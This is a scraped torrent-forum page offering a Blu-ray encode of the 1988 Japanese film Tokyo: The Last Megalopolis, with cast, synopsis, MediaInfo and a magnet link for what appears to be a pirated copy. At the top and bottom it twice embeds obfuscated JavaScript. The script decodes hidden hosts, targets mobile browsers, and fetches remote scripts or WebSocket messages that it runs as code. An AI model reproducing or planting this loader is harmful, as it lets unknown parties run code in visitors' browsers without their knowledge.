帝都物语[简繁字幕].Tokyo.The.Last.Megalopolis.1988.BluRay.1080p.DTS-HD.MA.2.0.x265.10bit 17.72GB

版主小s 1月前 288

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 帝都物语 / Tokyo: The Last Megalopolis

◎片 名 帝都物語

◎年 代 1988

◎产 地 日本

◎类 别 科幻 / 惊悚 / 恐怖

◎语 言 日语

◎上映日期 1988-01-30(日本)

◎IMDb链接 https://www.imdb.com/title/tt0096240/

◎豆瓣评分 7.0/10 (138人评价)

◎豆瓣链接 https://movie.douban.com/subject/3113813/

◎片 长 135分钟

◎导 演 实相寺昭雄 Akio Jissoji (id:1001470)

◎编 剧 林海象 Kaizo Hayashi (id:1010920)

荒俣宏 Hiroshi Aramata (id:1427212)

◎演 员 胜新太郎 Shintar? Katsu (id:1036986)

岛田久作 Ky?saku Shimada (id:1142576)

原田美枝子 Mieko Harada (id:1014550)

石田纯一 Junichi Ishida (id:1015289)

姿晴香 Haruka Sugata (id:1151941)

寺泉宪 Ken Teraizumi (id:1030753)

佐野史郎 Shir? Sano (id:1033690)

伊藤正幸 Seiko Ito (id:1436837)

安永亚衣 Ai Yasunaga (id:1012326)

寺田农 Minori Terada (id:1042740)

峰岸彻 T?ru Minegishi (id:1010115)

日野利彦 Toshihiko Hino (id:1336874)

长江英和 Hidekazu Nagae (id:1052814)

志水季里子 Kiriko Shimizu (id:1329981)

中村贺津雄 Katsuo Nakamura (id:1048674)

宍户锭 Jo Shishido (id:1142662)

井川比佐志 Hisashi Igawa (id:1042429)

岛田正吾 Shogo Shimada (id:1038242)

大泷秀治 Hideji ?taki (id:1136973)

西村晃 K? Nishimura (id:1008337)

高桥幸治 Koji Takahashi (id:1020223)

平干二朗 Mikijiro Hira (id:1042445)

Lia Sargent Lia Sargent (id:1296705)

荒俣宏 Hiroshi Aramata (id:1427212)

实相寺昭雄 Akio Jissoji (id:1001470)

中堀正夫 Masao Nakabori (id:1292891)

浦岡敬一 Keiichi Uraoka (id:1299743)

木村威夫 Takeo Kimura (id:1288571)

池谷仙克 Noriyoshi Ikeya (id:1303651)

大木淳吉 Junkichi Oki (id:1337582)

大木淳吉 Junkichi Oki (id:1337582)

◎标 签 日本 / 実相寺昭雄 / 日本电影 / 恐怖 / 魔幻 / 实相寺昭雄 / 科幻 / 1988

◎简 介

明治45年,新日本进入高速发展时代。实业家涉泽荣一(勝新太郎 饰)请来阴阳师平井保昌(平幹二朗 饰)以及物理学家寺田寅彦(寺泉憲 饰),请求他们安抚因叛乱而被杀的平将门的怨灵,并借助这股灵力推行“东京改造计划”,试图自此建立一个武备完全的军事帝都。然而神秘的魔人保宪(嶋田久作 饰)却扰乱了涉泽的计划,他企图唤醒平将门的怨灵,进而摧毁东京。为达目的,加藤找到平将门的后裔——美丽的少女辰宮由佳理(姿晴香 饰)充当灵媒。一时间阴风阵阵,愁云密布,东京危在旦夕。为了保护帝都,上至军人政客,下至作家文豪纷纷行动起来……

本片根据荒俣宏同名原著小说的1~4卷改编。

◎获奖情况 (共2项)

第12届日本电影学院奖 (1989)

最佳美术指导(提名)

最佳剪辑(提名)

└──浦岡敬一 (id:1299743)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 138090305394772830843770741300510149983 (0x67E339B50E32DA328021D0D1EBAD4D5F)

  4. Complete name : Tokyo.The.La[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 17.7 GiB

  8. Duration : 2 h 15 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 18.7 Mb/s

  11. Encoded date : UTC 2021-10-22 16:36:07

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 2 h 15 min

  21. Bit rate : 17.9 Mb/s

  22. Width : 1 920 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 16:9

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.361

  31. Stream size : 17.0 GiB (96%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 18743 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / total-frames=194657 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=21.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 2 h 15 min

  49. Bit rate mode : Variable

  50. Bit rate : 767 kb/s

  51. Channel(s) : 2 channels

  52. Channel layout : L R

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 16 bits

  56. Compression mode : Lossless

  57. Stream size : 742 MiB (4%)

  58. Title : Japanese DTS-HD Master Audio 2.0 @ 768 kbps

  59. Language : Japanese

  60. Default : Yes

  61. Forced : No


  62. Text #1

  63. ID : 3

  64. Format : PGS

  65. Codec ID : S_HDMV/PGS

  66. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  67. Duration : 2 h 11 min

  68. Bit rate : 16.2 kb/s

  69. Count of elements : 1514

  70. Stream size : 15.2 MiB (0%)

  71. Title : Chs/SUP 简体

  72. Language : Chinese

  73. Default : Yes

  74. Forced : No


  75. Text #2

  76. ID : 4

  77. Format : PGS

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 2 h 11 min

  81. Bit rate : 16.7 kb/s

  82. Count of elements : 1514

  83. Stream size : 15.7 MiB (0%)

  84. Title : Cht/SUP 繁体

  85. Language : Chinese

  86. Default : No

  87. Forced : No


  88. Menu

  89. 00:00:00.000 : en:第 01 章

  90. 00:04:30.604 : en:第 02 章

  91. 00:05:45.512 : en:第 03 章

  92. 00:09:15.764 : en:第 04 章

  93. 00:14:36.709 : en:第 05 章

  94. 00:15:49.615 : en:第 06 章

  95. 00:21:01.594 : en:第 07 章

  96. 00:31:34.893 : en:第 08 章

  97. 00:31:59.459 : en:第 09 章

  98. 00:38:16.169 : en:第 10 章

  99. 00:43:47.458 : en:第 11 章

  100. 00:47:21.756 : en:第 12 章

  101. 00:50:13.510 : en:第 13 章

  102. 00:54:15.544 : en:第 14 章

  103. 00:57:24.900 : en:第 15 章

  104. 01:06:11.050 : en:第 16 章

  105. 01:09:07.894 : en:第 17 章

  106. 01:13:44.211 : en:第 18 章

  107. 01:17:13.504 : en:第 19 章

  108. 01:22:49.423 : en:第 20 章

  109. 01:30:37.140 : en:第 21 章

  110. 01:32:21.119 : en:第 22 章

  111. 01:36:59.731 : en:第 23 章

  112. 01:45:03.255 : en:第 24 章

  113. 02:05:29.105 : en:第 25 章

  114. 02:10:04.380 : en:第 26 章


TAGS 惊悚 恐怖 科幻

磁力链:
  • magnet:?xt=urn:btih:29FD242BD939A1FF478E73E8DA21531F3080687C

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};